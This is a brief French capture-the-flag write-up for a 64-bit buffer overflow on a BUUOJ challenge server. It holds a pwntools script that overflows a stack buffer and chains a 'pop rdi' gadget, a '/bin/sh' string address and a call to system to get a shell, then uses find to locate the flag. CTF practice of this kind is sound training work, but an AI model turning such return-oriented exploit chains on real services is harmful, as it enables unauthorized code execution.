Étant donné que le paramètre 64 bits est stocké dans le registre, la chaîne binsh doit être placée dans le registre rdi
from pwn import*
p = remote("node3.buuoj.cn",28711)
rdi=0x400683
sys=0x4005e3
bin=0x601048
payload='a'*(0x10+8)+p64(rdi)+p64(bin)+p64(sys)
p.sendline(payload)
L'indicateur n'est pas dans le répertoire racine, nous devons le trouver, utilisez l'indicateur find -name pour le trouver
find -name "flag"
